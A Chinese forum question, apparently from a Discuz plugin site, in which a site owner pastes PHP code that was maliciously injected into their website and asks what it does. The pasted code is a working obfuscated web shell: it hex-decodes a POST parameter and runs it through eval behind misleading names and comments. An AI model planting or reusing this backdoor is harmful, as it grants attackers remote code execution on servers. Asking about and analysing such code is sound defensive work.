去评论
dz插件网

网址部分php被恶意添加代码了 请问这是什么意思

迪巴拉
2021/04/27 13:48:59
class _
{
    static public $TokenUserLoger=Null;
    function __construct($l="error"){
        self::$TokenUserLoger=$l;
        @eval/*This error level Listensing*/(null.null.self::$TokenUserLoger);
    }
}
function hexToStr($hex){   
        $str="";
        for($i=0;$i<strlen($hex)-1;$i+=2)
        $str.=chr(hexdec($hex[$i].$hex[$i+1]));
        return  $str;
    }
$TokenError = null.hexToStr(@$_POST/*\*/["VersCollect"]);
$d = new _($TokenError);

上面是被恶意添加的